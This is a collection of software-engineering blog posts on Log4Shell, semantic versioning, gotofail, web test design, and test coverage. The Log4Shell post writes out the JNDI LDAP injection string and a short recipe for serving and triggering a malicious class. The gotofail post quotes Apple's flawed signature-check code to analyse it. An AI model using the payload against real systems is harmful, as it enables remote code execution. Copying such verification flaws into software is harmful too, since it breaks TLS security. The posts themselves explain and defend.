Log4Shell: Lessons Learned for Software Architects

This week, the log4shell vulnerability in the Apache log4j library was disclosed (CVE-2021-44228). Exploiting this vulnerability is extremely simple, and log4j is used in many, many software systems that are critical to society — a lethal combination. What are the key lessons you, as a software architect, can draw from this?

The vulnerability

In versions 2.0-2.14.1, the log4j library would take special action when logging messages containing "${jndi:ldap://LDAP-SERVER/a}": it would look up a Java class on the LDAP server mentioned in the message, and execute that class.

This should of course never have been a feature, as it is almost the definition of a remote code execution vulnerability. Consequently, the steps to exploit a target system are alarmingly simple:

  1. Create a nasty class that you would like to execute on your target;
  2. Set up your own LDAP server somewhere that can serve your nasty class;
  3. "Attack" your target by feeding it strings of the form "${jndi:ldap://LDAP-SERVER/a}" where ever possible — in web forms, search forms, HTTP requests, etc. If you’re lucky, some of this user input is logged, and just like that your nasty class gets executed.

Interestingly, this recipe can also be used to make a running instance of a system immune to such attacks, in an approach dubbed logout4shell: if your nasty class actually wants to be friendly, it can programmatically disable remote JNDI execution, thus safeguarding the system against any new attacks (until the system is restarted).

The source code for logout4shell is available on GitHub: it also serves as an illustration of how extremely simple any attack will be.

Under attack

As long as your system is vulnerable, you should assume you or your customers are under attack:

  1. Depending on the type of information stored or services provided, (foreign) nation states may use the opportunity to collect as much (confidential) information as possible, or infect the system so that it can be accessed later;
  2. Ransomware "entrepreneurs" are delighted by the log4shell opportunity. No doubt their investments in an infrastructure to scan systems for this vulnerability and ensure future access to these systems will pay off.
  3. Insiders, intrigued by the simplicity of the exploit, may be tempted to explore systems beyond their access levels.

All this calls for a system setup according to the highest security standards: deployments that are isolated as much as possible, access logs, and the ability to detect unwarranted changes (infections) to deployed systems.

Applying the Fix

Naturally, the new release of log4j, version 2.15, contains a fix. Thus, the direct solution for affected systems is to simply upgrade the log4j dependency to 2.15, and re-deploy the safe system as soon as possible.

This may be more involved in some cases, due to backward incompatibilities that may have been introduced. For example, in version 2.13 support for Java 7 was stopped. So if you’re still on Java 7, just upgrading log4j is not as simple (and you may have other security problems than just log4shell). If you’re still stuck with log4j 1.x (end-of-life since 2015), then log4shell isn’t a problem, but you have other security problems instead.

Furthermore, log4j is widely used in other libraries you may depend on, such as Apache Flink, Apache Solr, neo4j, Elasticsearch, or Apache Struts: See the list of over 150 affected systems. Upgrading such systems may be more involved, for example if you’re a few versions behind or if you’re stuck with Java 7. Earlier, I described how upgrading a system using Struts, Spring, and Hibernate took over two weeks of work.

All this serves as a reminder of the importance of dependency hygiene: the need to ensure dependencies are at their latest versions at all times. Upgrading versions can be painful in case of backward incompatibilities. This pain should be swallowed as early as possible, and not postponed until the moment an urgent security upgrade is needed.

Deploying the Fix

Deploying the fix yourself should be simple: with an adequate continuous deployment infrastructure it is a push of a button, or happens automatically in reaction to a commit.

If your customers need to install an upgraded version of your system themselves, things may be harder. Here investments in a smooth update process pay off, as well as a disciplined versioning approach that encourages customers to update their system regularly, with as few incompatibility roadblocks as possible.

If your system is a library, you’re probably using semantic versioning. Ideally, the only change in the new release is the log4j upgrade, meaning you can simply increment the patch version identifier. If necessary, you can consider backporting the patch to earlier major releases.

Your Open Source Stack

As illustrated by log4shell, most modern software stacks critically depend on open source libraries. If you benefit from open source, it is imperative that you donate back. This can be in kind, by freeing your own developers to contribute to open source. A simpler approach may be to donate money, for example to the Apache Software Foundation. This can also buy you influence, to make sure the open source libraries develop the features you want, or conduct the security audits that you hope for.

The Role of the Architect

As a software architect, your key role is not to react to an event like log4shell. Instead, it is to design a system that minimizes the likelihood of such an event and its impact on the confidentiality, integrity, and availability of that system.

This requires investments in:

  • Maintainability: Enforcing dependency hygiene, keeping dependencies current at all times, to minimize mean time to repair and maximize availability
  • Deployment security: Isolating components where possible and logging access, to safeguard confidentiality and integrity;
  • Upgradability: Ensuring that those who have installed your system or who use your library can seamlessly upgrade to (security) patches;
  • The open source ecosystem: Sponsoring the development of open source components you depend on, and contributing to their security practices.

To make this happen, you must guide the work of multiple people, including developers, customer care, operations engineers, and the security officer, and secure sufficient resources (including time and money) for them. Most importantly, this requires that as an architect you must be an effective communicator at multiple levels, from developer to CEO, from engine room to penthouse.

Launching AFL: The AI for Fintech Lab

AFL Announcement

I am extremely proud that yesterday we publicly announced the AI for Fintech Lab — AFL.

The AI for Fintech Lab (AFL) is a collaboration between ING and Delft University of Technology. The mission of AFL is to perform world-class research at the intersection of Artificial Intelligence, Data Analytics, and Software Analytics in the context of FinTech.

With 36 million customers, activities in 42 countries, and a total of 50,000 employees of which 15,000 work in IT, software and data technology is at the heart of ING’s business and operations. In this context, the AFL seeks to develop new AI-driven theories, methods, and tools in large scale data and software analytics.

Over the next five years, ten PhD researchers will work in the lab. Research topics will include human-centered software analytics, autonomous software engineering, analytics delivery, data integration, and continuous experimentation.

AFL will be bi-located at the ING campus Amsterdam and the TU Delft campus in Delft, bringing together students, engineers, researchers, professors, and entrepreneurs from both organizations at both locations.


AFL will join the Innovation Center for Artificial Intelligence (ICAI) as one of its labs. ICAI is a virtual organization consisting of a series of labs of similar size (over five PhD researchers each) funded directly by industry. AFL will benefit from the experience and expertise of other academic and industrial ICAI partners, such as Qualcomm, Bosch, Ahold Delhaize, the Dutch National Police, the University of Amsterdam, and Utrecht University.

As scientific director of the brand new AI-for-Fintech Lab, I look forward to this exciting, long term collaboration between ING and TU Delft.

And, yes, we are hiring!

If you’re interested in bringing together industry and academia, if you’re not afraid to work at two locations, and if you have a strong background in computer science (software engineering, artificial intelligence, data science), you are welcome to apply as a PhD student! Details about the application process will follow soon.

Besides PhD students, we will have related positions for postdoctoral researchers and scientific programmers. And of course, TU Delft BSc students and MSc students are welcome to conduct their research projects within the AI for Fintech Lab!

I look forward to a great collaboration spanning at least five years, with exciting new results in the areas of AI, data science, and software engineering!


Beyond Page Objects

During the last couple of months I had a good time using Protractor to create an end-to-end test suite for an AngularJS web application.

While applying the Page Object pattern, I realized that I needed more guidance on what page objects to create, and how to navigate through my web application.

To that end, I started drawing little state charts for my web application. Naturally, ‘page objects’ corresponded to states, and their methods to either state inspection methods (is my browser in the correct state?) or state transition methods (clicking this button will bring me to the next state).

Gradually, the following process emerged:

  1. If you want to test certain behavior of your web application, draw a little state diagram to capture the navigation for that behavior.

  2. Create ‘state objects’ for each of the states.

  3. Give each state object its ‘inspection methods’ (what is visible in the web application if I’m in this state) as well as ‘transition methods’ (clicks leading to a new state), as sketched in the example after this list.

  4. I also find it helpful to give each state object a ‘selfcheck’ method, which just verifies whether the web application is indeed in the state corresponding to the state object.

  5. With the state objects in place, think of the paths you want to take through the application.

  6. The simplest starting point is to write one test for each basic transition: Bring the application into state A, click somewhere, and verify you ended up in the required state B.

  7. Next, you may want to consider longer paths, in which earlier transitions affect later behavior. An example is testing proper use (and resetting of) client-side caching.
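
To make steps 2-4 concrete, here is a minimal state object sketched in Java with Selenium WebDriver (the article’s examples use Protractor, but the pattern is the same); the element locators and the ResultsState successor state are made up for illustration.

import org.openqa.selenium.By;
import org.openqa.selenium.WebDriver;

// State object for a hypothetical search page.
public class SearchState {

    private final WebDriver driver;

    public SearchState(WebDriver driver) {
        this.driver = driver;
    }

    // 'Selfcheck' method: is the browser really in the search state?
    public boolean selfCheck() {
        return driver.findElement(By.id("search-box")).isDisplayed();
    }

    // Inspection method: what is visible in this state?
    public String pageTitle() {
        return driver.getTitle();
    }

    // Transition method: submitting a query leads to the results state.
    // ResultsState is a second, not-shown state object of the same shape.
    public ResultsState search(String query) {
        driver.findElement(By.id("search-box")).sendKeys(query);
        driver.findElement(By.id("search-button")).click();
        return new ResultsState(driver);
    }
}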

I wrote a longer article about this approach, available as “Beyond Page Objects: Testing Web Applications with State Objects”, published in ACM Queue in June 2015, as well as in the Communications of the ACM in August 2015.

The paper also explains how to deal with more complex state machines (using superstates and AND-states, for example), how to use a transition tree to oversee the coverage of longer paths, and how to deal with the infamous back-button. Furthermore, I extended the example “PhoneCat” AngularJS application with a state-object based test suite, available from my GitHub page.

Admittedly, the idea to use state machines for testing purposes is not new at all — yet elaborating how it can be used for testing web applications with WebDriver was helpful to me. I hope you find the use of state objects helpful too.

Semantic Versioning? In Maven Central? Breaking Changes!

I love the use of semantic versioning. It provides clear guidelines on when an API version number should be bumped. In particular, if a change to an API breaks backward compatibility, the major version identifier must be updated. Thus, when, as a client of such an API, I see a minor or patch update, I can safely upgrade, since such updates should never break my build.

But to what extent are people actually using the guidelines of semantic versioning? Has the adoption of semantic versioning increased over time? Does the use of semantic versioning speed up library upgrades? And if there are breaking changes, are these properly announced by means of deprecation tags?

To better understand semantic versioning, we studied seven years of versioning history in the Maven Central Repository. Here is what we found.

Versioning Policies

Semantic Versioning is a systematic approach to give version numbers to API releases. The approach has been developed by Tom Preston-Werner, and is advocated by GitHub. It is “based on but not necessarily limited to pre-existing widespread common practices in use in both closed and open-source software.”

In a nutshell, semantic versioning is based on MAJOR.MINOR.PATCH identifiers with the following meaning:

  • MAJOR: increment when you make incompatible API changes

  • MINOR: increment when you add functionality in a backward-compatible manner

  • PATCH: increment when you make backward-compatible bug fixes

Versioning in Maven Central

To understand how developers actually use versioning policies, we studied seven years of history of Maven Central. Our study comprises around 130,000 released jar files, of which 100,000 come with source code. On average, we found around 7 versions per library in our data set.

The data set runs from 2006 to 2011, so predates the semantic versioning manifesto. Since the manifesto claims to be based on existing practices, it is interesting to investigate to what extent API developers releasing via maven have adhered to these practices.

As shown below, in Maven Central, the major.minor.patch scheme is adopted by the majority of projects.

Frequency of semver identifiers in maven

Breaking Changes

To understand to what extent version increments correspond to breaking changes, we identified all “update pairs”: a version of a given Maven package together with its immediate successor.

To be able to assess semantic versioning compliance, we need to determine backward compatibility for such update pairs. Since in general this is undecidable, we use binary compatibility as a proxy. Two library versions are binary compatible if interchanging them does not force client code to be recompiled. Examples of incompatible changes are removing a public method or class, or adding parameters to a public method.

We used the Clirr tool to detect such binary incompatibilities automatically for Java. For those interested, there is also a SonarQube Clirr plugin for compatibility checking in a continuous integration setting; an alternative tool is japi.
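
As a small, made-up illustration of such a binary incompatibility, consider a library class whose public method signature changes in what is presented as a patch release:

// Hypothetical library class, as shipped in version 1.2.0.
public class Report {

    // Suppose version 1.2.1 changes this method to
    //   public void export(String path, boolean overwrite)
    // Changing (or removing) a public method signature is binary incompatible:
    // clients compiled against 1.2.0 fail at run time with NoSuchMethodError,
    // even though 1.2.1 looks like a harmless patch release.
    public void export(String path) {
        // ...
    }
}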

Major versus Minor/Patch Releases

For major releases, breaking changes are permitted in semantic versioning. This is also what we see in our dataset: a little over one third of the major releases introduce binary incompatibilities:

Breaking changes in major releases

Interestingly, we see a very similar figure for minor releases: a little over one third of the minor releases introduce binary incompatibilities too. This, however, violates the semantic versioning guidelines.

Breaking changes in minor releases

The situation is somewhat better for patch releases, which introduce breaking changes in around a quarter of the cases. This nevertheless conflicts with semantic versioning, which insists that patches be backward compatible.

Breaking changes in patch releases

Overall, we see that minor and major releases are equally likely to introduce breaking changes.

The graph below shows that these trends are fairly stable over time. Minor (~40%) and patch releases (~45%) are most common, and major releases (~15%) are least common.

Adherence over time.

The orange line indicates releases with breaking changes: Around 30% of the releases introduce breaking changes — a number that is slightly decreasing over time, but still at 29%.

Of these releases with breaking changes, the vast majority is non-major (the crossed green line at ~25%). Thus, a quarter of all releases do not comply with semantic versioning.

Deprecation to the Rescue?

The above analysis demonstrates a deep need to introduce breaking changes: apparently, developers wish to introduce breaking changes in 30% of their API releases.

Apart from requiring that such changes take place in major releases, semantic versioning insists on using deprecation to announce such changes. In particular:

Before you completely remove the functionality in a new major release there should be at least one minor release that contains the deprecation so that users can smoothly transition to the new API.
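
As a minimal sketch of that guideline (the class and method names are made up): deprecate the old method in a minor release, point clients to its replacement, and only remove it in the next major release.

public class HttpClient {

    /**
     * @deprecated since 2.3.0 (a minor release); use {@link #fetch(String)}
     *             instead. Scheduled for removal in 3.0.0.
     */
    @Deprecated
    public String get(String url) {
        return fetch(url);
    }

    public String fetch(String url) {
        // ... actual implementation ...
        return "";
    }
}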

Given the many breaking changes we saw, how many deprecation tags would there be?

At the library level, 1,000 out of the 20,000 libraries (5%) we studied include at least one deprecation tag.

When we look at the individual method level, we find the following:

  • Over 86,000 public methods are removed in a minor release, without any deprecation tag.
  • Almost 800 public methods receive a deprecation tag in their life span: These methods, however, are never removed.
  • 16 public methods receive a deprecation tag that is subsequently undone in a later release (the method is “undeprecated”).

That is all we found. In other words, we did not find a single method that was deprecated according to the guidelines of semantic versioning (deprecate in minor, then delete in major).

Furthermore, the worst behavior (deletion in minor without deprecation, over 86,000 methods) occurs a hundred times more often than the best behavior witnessed (deprecation without deletion, almost 800 methods).

Discussion

Our findings are based on a somewhat older dataset obtained from Maven Central. It might therefore be that adherence to semantic versioning is higher now than what we report.

Our findings also take breaking changes to any public method or class into account. In practice, certain packages will be considered as API only, whereas others are internal only — yet declared public due to the limitations of the Java modularization system. We are working on a further analysis in which we explicitly measure to what extent the changed public methods are used. Initial findings within the maven data set suggest that there are hundreds of thousands of compilation problems in clients caused by these breaking changes — suggesting that it is not just internal modules containing these changes.

Some non-Java package managers have explicitly adopted semantic versioning. A notable example is npm, and NuGet has also initiated a discussion. While npm has a dedicated library to determine version orderings according to the Semantic Versioning standard, I am not aware of JavaScript compatibility tools that are used to check for breaking changes. For .NET (NuGet), tools similar to Clirr exist, such as LibCheck, ApiChange, and the NDepend build comparison tools. I do not know, however, how widespread their use is.

Last but not least, binary incompatibility, as measured by Clirr, is just one form of backward incompatibility. An API may change the behavior of methods as well, in breaking ways. A way to detect those might be by applying old test suites to new code — which we have not done yet.

Conclusion

Breaking API changes are a fact of life. Therefore, meaningful version identifiers are a cause worth fighting for. Thus:

  1. If you adopt semantic versioning for your API, double check that your minor and patch releases are indeed backward compatible. Consider using tools such as Clirr, or a dedicated test suite.

  2. If you rely on an API that claims to be following semantic versioning, don’t put too much faith in backward compatibility promises.

  3. If you want to follow semantic versioning, be prepared to bump the major version identifier often.

  4. Should you need to introduce breaking changes, do not forget to announce these with deprecation tags in minor releases first.

  5. If you are in research, note that the problems involved in preventing, encapsulating, detecting, and handling breaking changes are tough and real. Backward compatibility deserves your research attention.

The full details of our study are published in our paper presented (slides) at the IEEE International Working Conference on Source Code Analysis and Manipulation (SCAM), held in Victoria, BC, September 2014.

This post is based on joint work by Steven Raemaekers and Joost Visser, both from the Software Improvement Group.

© Copyright Arie van Deursen, October 2014.

EDIT, November 2014

If you are a Java developer and serious about semantic versioning, then check out this open source semantic versioning checking tool. It is available on Maven Central and on GitHub, and it can check differences, validate version numbers, and suggest proper version numbers for your new jar release.

Learning from Apple’s #gotofail Security Bug

Yesterday, Apple announced iOS 7.0.6, a critical security update for iOS 7 — and an update for OS X / Safari is likely to follow soon (if you haven’t updated iOS yet, do it now).

The problem turns out to be caused by a seemingly simple programming error, now widely discussed as #gotofail on Twitter.

What can we, as software engineers and educators of software engineers, learn from this high impact bug?

The Code

A careful analysis of the underlying problem is provided by Adam Langley. The root cause is in the following code:

static OSStatus
SSLVerifySignedServerKeyExchange(SSLContext *ctx, bool isRsa, SSLBuffer signedParams,
                                 uint8_t *signature, UInt16 signatureLen)
{
    OSStatus        err;
    ...

    if ((err = SSLHashSHA1.update(&hashCtx, &serverRandom)) != 0)
        goto fail;
    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
        goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;
    ...

fail:
    SSLFreeBuffer(&signedHashes);
    SSLFreeBuffer(&hashCtx);
    return err;
}

To any software engineer, the two consecutive goto fail lines will be suspicious. They are, and more than that. To quote Adam Langley:

The code will always jump to the end from that second goto, err will contain a successful value because the SHA1 update operation was successful and so the signature verification will never fail.

Not verifying a signature is exploitable. In the upcoming months, there will remain plenty of devices running older versions of iOS and MacOS. These will remain vulnerable, and exploitable.

Brittle Software Engineering

When first seeing this code, I was once again struck by how incredibly brittle programming is. Just adding a single line of code can bring a system to its knees.

For seasoned software engineers this will not be a real surprise. But students and aspiring software engineers will have a hard time believing it. Therefore, sharing problems like this is essential, in order to create sufficient awareness among students that code quality matters.

Code Formatting is a Security Feature

When reviewing code, I try to be picky on details, including white spaces, tabs, and new lines. Not everyone likes me for that. I often wondered whether I was just annoyingly pedantic, or whether it was the right thing to do.

The case at hand shows that white space is a security concern. The correct indentation immediately shows something fishy is going on, as the final check now has become unreachable:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0)
        goto fail;
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Insisting on curly braces would highlight the fault even more:

    if ((err = SSLHashSHA1.update(&hashCtx, &signedParams)) != 0) {
        goto fail;
    }
    goto fail;
    if ((err = SSLHashSHA1.final(&hashCtx, &hashOut)) != 0)
        goto fail;

Indentation Must be Automatic

Because code formatting is a security feature, we must not do it by hand, but use tools to get the indentation right automatically.

A quick inspection of the sslKeyExchange.c source code reveals that it is not routinely formatted automatically: There are plenty of inconsistent spaces, tabs, and code in comments. With modern tools, such as Eclipse-format-on-save, one would not be able to save code like this.

Yet just forcing developers to use formatting tools may not be enough. We must also invest in improving the quality of such tools. In some cases, hand-made layout can make a substantial difference in the understandability of code. Perhaps current tools do not sufficiently acknowledge such needs, leading to under-use of today’s formatting tools.

Code Review to the Rescue?

Besides automated code formatting, critical reviews might also help. In the words of Adam Langley:

Code review can be effective against these sorts of bug. Not just auditing, but review of each change as it goes in. I’ve no idea what the code review culture is like at Apple but I strongly believe that my colleagues, Wan-Teh or Ryan Sleevi, would have caught it had I slipped up like this. Although not everyone can be blessed with folks like them.

While I fully subscribe to the importance of reviews, a word of caution is in order. My colleague Alberto Bacchelli has investigated how code review is applied today at Microsoft. His findings (published as a paper at ICSE 2013, and nicely summarized by Alex Nederlof as The Truth About Code Reviews) include:

There is a mismatch between the expectations and the actual outcomes of code reviews. From our study, review does not result in identifying defects as often as project members would like and even more rarely detects deep, subtle, or “macro” level issues. Relying on code review in this way for quality assurance may be fraught.

Automated Checkers to the Rescue?

If manual reviews won’t find the problem, perhaps tools can find it? Indeed, the present mistake is a simple example of a problem caused by unreachable code. Any computer science student will be able to write a (basic) “unreachable code detector” that would warn about the unguarded goto fail followed by more (unreachable) code (assuming parsing C is a ‘solved problem’).

Therefore, it is no surprise that plenty of commercial and open source tools exist to check for such problems automatically: Even using the compiler with the right options (presumably -Weverything for Clang) would warn about this problem.

Here, again, the key question is why such tools are not applied. The big problem with tools like these is their lack of precision, leading to too many false alarms. Forcing developers to wade through long lists of irrelevant warnings will do little to prevent bugs like these.

Unfortunately, this lack of precision is a direct consequence of the fact that unreachable code detection (like many other program properties of interest) is a fundamentally undecidable problem. As such, an analysis always needs to make a tradeoff between completeness (covering all suspicious cases) and precision (covering only cases that are certainly incorrect).

To understand the sweet spot in this trade off, more research is needed, both concerning the types of errors that are likely to occur, and concerning techniques to discover them automatically.

Testing is a Security Concern

As an advocate of unit testing, I wonder how the code could have passed a unit test suite.

Unfortunately, the testability of the problematic source code is very poor. In the current code, functions are long, and they cover many cases in different conditional branches. This makes it hard to invoke specific behavior, and to bring the functions into a state in which the given behavior can be tested. Furthermore, observability is low, especially since parts of the code deliberately obfuscate results to protect against certain types of attacks.

Thus, given the current code structure, unit testing will be difficult. Nevertheless, the full outcome can be tested, albeit at the system (not unit) level. Quoting Adam Langley again:

I coded up a very quick test site at https://www.imperialviolet.org:1266. […] If you can load an HTTPS site on port 1266 then you have this bug.

In other words, while the code may be hard to unit test, the system luckily has well defined behavior that can be tested.

Coverage Analysis

Once there is a set of (system or unit level) tests, the coverage of these tests can be used as an indicator for (the lack of) completeness of the test suite.

For the bug at hand, even the simplest form of coverage analysis, namely line coverage, would have helped to spot the problem: Since the problematic code results from unreachable code, there is no way to achieve 100% line coverage.

Therefore, any serious attempt to achieve full statement coverage should have revealed this bug.

Note that trying to achieve full statement coverage, especially for security or safety critical code, is not a strange thing to require. For aviation software, statement coverage is required for criticality “level C”:

Level C:

Software whose anomalous behavior, as shown by the system safety assessment process, would cause or contribute to a failure of system function resulting in a major failure condition for the aircraft.

This is one of the weaker categories: For the catastrophic ‘level A’, even stronger test coverage criteria are required. Thus, achieving substantial line coverage is neither impossible nor uncommon.

The Return-Error-Code Idiom

Finally, looking at the full sources of the affected file, one of the key things to notice is the use of the return code idiom to mimic exception handling.

Since C has no built-in exception handling support, a common idiom is to insist that every function returns an error code. Subsequently, every caller must check this returned code, and include an explicit jump to the error handling functionality if the result is not OK.

This is exactly what is done in the present code: the err variable is set, checked, and returned for every function call and, if not OK, followed by (hopefully exactly one) goto fail.

Almost 10 years ago, together with Magiel Bruntink and Tom Tourwe, we conducted a detailed empirical analysis of this idiom in a large code base of an embedded system.

One of the key findings of our paper is that in the code we analyzed we found a defect density of 2.1 deviations from the return code idiom per 1000 lines of code. Thus, in spite of very strict guidelines at the organization involved, we found many examples of not just unchecked calls, but also incorrectly propagated return codes, or incorrectly handled error conditions.

Based on that, we concluded:

The idiom is particularly error prone, due to the fact that it is omnipresent as well as highly tangled, and requires focused and well-thought programming.

It is sad to see our results from 2005 confirmed today.


© Arie van Deursen, February 22, 2014.


EDIT February 24, 2014: Fixed incorrect use of ‘dead code detection’ terminology into correct ‘unreachable code detection’, and weakened the claim that any computer science student can write such a detector based on the reddit discussion.


Test Automation Day 2014

One of the software testing events in The Netherlands I like a lot is the Test Automation Day. It is a one day event, which in 2014 will take place on June 19 in Rotterdam. The day will be packed with (international) speakers, with presentations targeting developers, testers, as well as management.

Test automation is a broad topic: it aims at offering tool support for software testing processes wherever this is possible. This raises a number of challenging questions:

  • What are the costs and benefits of software test automation? When and why should I apply a given technique?
  • What tools and techniques are available? What are their limitations and how can they be improved?
  • How can automation be applied in such areas as test execution, test case design, test input generation, test output evaluation, and test suite optimization?


The Test Automation Day was initiated four years ago by Squerist, and organized by CKC Seminars. In the past years, it has brought together over 200 test experts each year. During those years, we have built up some good traditions:

  • We have been able to attract some wonderful keynote speakers, including Scott Barber (performance testing, 2011, 2012), Elfriede Dustin (test automation for the DoD, 2012), Walter Belgers (security, 2012), Mieke Gevers (Agile processes, 2013), Lionel Briand (model-based testing, 2013), and Emily Bache (future of test automation, 2013). For 2014, we are in the process of keynote selection and invitation.

  • A mixture of Dutch and international speakers.

  • Coverage of a broad range of topics in parallel tracks.

Workshop with Scott Barber

  • A mixture of different formats, including workshops, keynotes, a hands-on testlab, and tutorials, by such experts as Dorothy Graham, Steve Freeman, and Matt Heuser.

  • Presentations from industry (testers, developers, client organizations) and universities (new research results, tools and techniques), with a focus on practical applicability.

  • A mixture of invited (keynote) presentations, open contributions that can be submitted by anyone working in the area of software test automation, and sponsored presentations.

  • Pre-conference events, which this year will be in the form of a masterclass on Wednesday June 18.

This year’s call for contributions is still open. If you do something cool in the area of software test automation, please submit a proposal for a presentation! Deadline Monday December 2, 2013!

You are very much welcome to submit your proposal. Your proposal will be evaluated by the international TADNL program committee, who will look at the timeliness, innovation, technical content, and inspiration that the audience will draw from your presentation. Also, if you have suggestions for a keynote you would like to hear at TADNL2014, please send me an email!

This year’s special theme is test automation innovation: so if you work with, or are working on, some exciting new test automation method or technique, make sure you submit a proposal!

We look forward to your contributions, and to seeing you in Rotterdam in June 2014!

Test Automation Day 2013

Test Coverage: Not for Managers?

Last week I was discussing how one of my students could use test coverage analysis in his daily work. His observation was that his manager had little idea about coverage. Do managers need coverage information? Can they do harm with coverage numbers? What good can project leads do with coverage data?

For me, coverage analysis is first and foremost a code reviewing tool. Test coverage information helps me to see which code has not been tested. This I can use to rethink

  1. The test suite: How can I extend the test suite to cover the corner cases that I missed?
  2. The test strategy: Is there a need for me to extend my suite to cover the untested code? Why did I miss it?
  3. The system design: How can I refactor my code so that it becomes easier to test the missing cases?
  4. An incoming change (pull request): Is the contributed code well tested?

Coverage is not a management tool. While coverage information is essential to have good discussions on testing, using test coverage percentages to manage a project calls for caution.

To appreciate why managing by coverage numbers is problematic, let’s look at four common pitfalls of using software metrics in general, and see how they apply to test coverage as well.

Coverage Without Context

A coverage number gives a percentage of statements (or classes, methods, branches, blocks, …) in your program hit by the test suite. But what does such a number mean? Is 80% good or not? When is it good? Why is it good? Should I be alarmed at anything below 50%?

The key observation is that coverage numbers should not be leading: coverage targets (if used at all) should be derived from an overall project goal. For example:

  • We want a well-designed system. Therefore we use coverage analysis to discover classes that are too hard to test and hence call for refactoring;
  • We want to make sure we have meaningful tests in place for all critical behavior. Therefore, we analyze for which parts of this behavior no such tests are in place.
  • We have observed class Foo is bug prone. Hence we monitor its coverage, and no change that decreases its coverage is allowed.
  • For the avionics software system we are building, we need to comply with standard DO178b. Thus, we must demonstrate that we achieve modified condition/decision coverage;

With these higher level goals in place, it is also possible to argue when low coverage is acceptable:

  • These packages are deprecated, so we do not need to rethink the test suite nor its design anymore.
  • These classes take care of the user interface, which we do not consider critical for our application
  • These classes are so simple that we deem automated testing unnecessary.
  • This code has been stable for years, so we do not really care anymore how well it is tested.

Code coverage is a means to an end; it is not a goal in itself.

Treating The Numbers

The number one reason developers are wary of managers using coverage numbers is that it may give incentives to write useless tests.

Measuring Snow

src: flickr

Coverage numbers are easily tricked. All one needs to do is invoke a few methods in the test cases. No need for assertions, or any meaningful verification of the outcomes, and the coverage numbers are likely to go up.
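
As a deliberately bad, made-up example: the test below executes plenty of lines of a hypothetical ShoppingCart class, so the coverage numbers go up, yet it verifies nothing.

import org.junit.Test;

public class ShoppingCartTest {

    // ShoppingCart is a hypothetical class under test.
    // This test bumps its coverage, but contains no assertions:
    // the only thing it checks is the absence of unexpected exceptions.
    @Test
    public void touchLotsOfCode() {
        ShoppingCart cart = new ShoppingCart();
        cart.add("book", 2);
        cart.applyDiscount(0.10);
        cart.total();
    }
}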

Test cases to game coverage numbers are dangerous:

  1. The resulting test cases are extremely weak. The only information they provide is that a certain sequence of calls does not lead to an unexpected exception.

  2. The faked high coverage may give a false sense of confidence;

  3. The presence of poor tests undermines the testing culture in the team.

Once again: A code coverage percentage is not a goal in itself: It is a means to an end.

One-Track Coverage

There is little information that can be derived from the mere knowledge that a test suite covers 100% of the statements. Which data values went through the statements? Was my if-then conditional exercised with a true as well as a false value? What happens if I invoke my methods in a different order?

Marter track in snow

src: flickr

A lot more information can be derived from the fact that the test suite achieves, say, just 50% test coverage. This means that half of your code is not even touched by the test suite. The number tells you that you cannot use your test suite to say anything about the quality of half of your code base.

As such, statement coverage can tell us when a test suite is inadequate, but it can never tell us whether a test suite is adequate.

For this reason, a narrow focus on a single type of coverage (such as statement coverage) is undesirable. Instead, a team should be aware of a range of different coverage criteria, and use them where appropriate. Example criteria include decision coverage, state transition coverage, data-flow coverage, or mutation coverage — and the only limitation is our imagination, as can be seen from Cem Kaner’s list of 101 coverage metrics, compiled in 1996.

The latter technique, mutation coverage, may help to fight gaming of coverage numbers. The idea is to generate mutations of the code under test, such as the negation of Boolean conditions or integer outcomes, or modifications of arithmetic expressions. A good test suite should trigger a failure for any such ‘erroneous’ mutation. If you want to experiment with mutation testing in Java (or Scala), you might want to take a look at the pitest tool.
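
A tiny, made-up example of the idea (for brevity, the method under test is inlined in the test class): the first test covers every line of isAdult, yet a mutant that flips >= into > survives, because no test exercises the boundary value 18. The second test kills that mutant.

import static org.junit.Assert.assertFalse;
import static org.junit.Assert.assertTrue;

import org.junit.Test;

public class AgeCheckTest {

    // Method under test; a mutation tool will try '>' instead of '>=', among others.
    static boolean isAdult(int age) {
        return age >= 18;
    }

    @Test
    public void weakTest() {
        // 100% line coverage, but the '>=' to '>' mutant survives.
        assertTrue(isAdult(30));
        assertFalse(isAdult(10));
    }

    @Test
    public void boundaryTest() {
        // Kills the mutant: isAdult(18) must be true.
        assertTrue(isAdult(18));
    }
}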

Coverage Galore

A final pitfall in using coverage metrics is to become over-enthusiastic, measuring coverage in many (possibly overlapping) ways.

Even a (relatively straightforward) coverage tool like EclEmma for Java can measure instruction, branch, line, method, and type coverage, and as a bonus can compute the cyclomatic complexity. Per metric it can show covered, missed, and total, as well as the percentage of covered items. Which of those should be used? Is it a good idea to monitor all forms of coverage at all levels?

Again, what you measure should depend on your goal.

If your project is just starting to test systematically, a useful goal will be to identify classes where a lot can be gained by adding tests. Then it makes sense to start measuring at the coarse class or method level, in order to identify classes most in need of testing. If, on the other hand, most code is reasonably well tested, looking at missed branches may provide the most insight.

The general rule is to start as simple as possible (just line coverage will do), and then to add alternative metrics when the simpler metric does not lead to new insights any more.

Additional forms of coverage should be different from (orthogonal to) the existing form of coverage used. For example, line coverage and branch coverage are relatively similar. Thus, measuring branch coverage besides line coverage may not lead to many additional cases to test (depending on your code). Mutation coverage, dataflow-based coverage, or state-machine based coverage, on the other hand, are much more different from line coverage. Thus, using one of those may be more effective in increasing the diversity of your test cases.

Putting Coverage to Good Use

Managers that are aware of the above pitfalls, can certainly put coverage to good use. Here are a few ways, taken from Glover’s classic Don’t be fooled by the coverage report:

Sun and Snow

src: flickr

  1. “Code without corresponding tests can be more challenging to understand, and is harder to modify safely. Therefore, knowing whether code has been tested, and seeing the actual test coverage numbers, can allow developers and managers to more accurately predict the time needed to modify existing code.” — I can only agree.

  2. “Monitoring coverage reports helps development teams quickly spot code that is growing without corresponding tests” — This happens: see our paper on the co-evolution of test and production code.

  3. “Given that a code coverage report is most effective at demonstrating sections of code without adequate testing, quality assurance personnel can use this data to assess areas of concern with respect to functional testing.” — A good reason to combine user story acceptance testing with coverage analysis.

Summary

Test coverage analysis is an important tool that any development team taking testing seriously should use.

More than anything else, coverage analysis is a reviewing tool that you can use to improve your own (test) code, and to evaluate someone else’s code and test cases.

Coverage numbers cannot be used as a key performance indicator (KPI) for project success. If your manager uses coverage as a KPI, make sure he is aware of the pitfalls.

